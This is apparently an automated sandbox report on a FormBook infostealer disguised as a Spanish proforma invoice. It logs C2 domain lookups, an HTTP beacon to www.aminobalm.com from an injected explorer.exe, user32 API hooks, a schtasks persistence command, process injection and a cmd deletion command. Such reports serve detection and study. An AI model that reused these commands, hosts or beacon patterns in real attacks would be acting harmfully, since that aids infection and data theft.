                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                              Oct 13, 2021 20:35:46.817334890 CEST | 8.8.8.8 | 192.168.2.3 | 0x6e9c | Name error (3) | www.palmonlae.space | none | none | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST | 8.8.8.8 | 192.168.2.3 | 0xa477 | No error (0) | www.aminobalm.com | parking3.dnstool.net | | CNAME (Canonical name) | IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST | 8.8.8.8 | 192.168.2.3 | 0xa477 | No error (0) | parking3.dnstool.net | | 13.209.99.177 | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST | 8.8.8.8 | 192.168.2.3 | 0xa477 | No error (0) | parking3.dnstool.net | | 3.35.27.175 | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST | 8.8.8.8 | 192.168.2.3 | 0xa477 | No error (0) | parking3.dnstool.net | | 13.125.234.146 | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST | 8.8.8.8 | 192.168.2.3 | 0xa477 | No error (0) | parking3.dnstool.net | | 13.228.77.229 | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST | 8.8.8.8 | 192.168.2.3 | 0xa477 | No error (0) | parking3.dnstool.net | | 13.230.138.127 | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:29.067773104 CEST | 8.8.8.8 | 192.168.2.3 | 0x9873 | Name error (3) | www.festival-du-chanvre.com | none | none | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:49.838001966 CEST | 8.8.8.8 | 192.168.2.3 | 0x8184 | Name error (3) | www.new-post-vehicle-site.xyz | none | none | A (IP address) | IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.aminobalm.com

                                              HTTP Packets

                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              0 | 192.168.2.3 | 49806 | 13.209.99.177 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Oct 13, 2021 20:36:07.588450909 CEST | 5853 | OUT | GET /cb3b/?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9h HTTP/1.1
                                              Host: www.aminobalm.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Oct 13, 2021 20:36:07.845493078 CEST | 5853 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx
                                              Date: Wed, 13 Oct 2021 18:36:07 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              Location: https://www.dotname.co.kr/customer/event/2019/20190604_landing_dotname?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9h
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function Name | Hook Type | Active in Processes
                                              PeekMessageA | INLINE | explorer.exe
                                              PeekMessageW | INLINE | explorer.exe
                                              GetMessageW | INLINE | explorer.exe
                                              GetMessageA | INLINE | explorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function Name | Hook Type | New Data
                                              PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE0
                                              PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE0
                                              GetMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE0
                                              GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE0

                                              Statistics

                                              Behavior


                                              System Behavior

                                              General

                                              Start time:20:34:13
                                              Start date:13/10/2021
                                              Path:C:\Users\user\Desktop\Factura de proforma.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Factura de proforma.exe'
                                              Imagebase:0x7a0000
                                              File size:495616 bytes
                                              MD5 hash:16F7045EEBB451234CA8078222C5994C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmp, Author: Joe Security
                                              Reputation:low

                                              General

                                              Start time:20:34:24
                                              Start date:13/10/2021
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp'
                                              Imagebase:0x1070000
                                              File size:185856 bytes
                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:20:34:24
                                              Start date:13/10/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7f20f0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:20:34:25
                                              Start date:13/10/2021
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Imagebase:0xb80000
                                              File size:45152 bytes
                                              MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              General

                                              Start time:20:34:26
                                              Start date:13/10/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0x7ff720ea0000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              General

                                              Start time:20:35:00
                                              Start date:13/10/2021
                                              Path:C:\Windows\SysWOW64\cscript.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\cscript.exe
                                              Imagebase:0x260000
                                              File size:143360 bytes
                                              MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Start time:20:35:04
                                              Start date:13/10/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                              Imagebase:0xd80000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:20:35:05
                                              Start date:13/10/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7f20f0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis
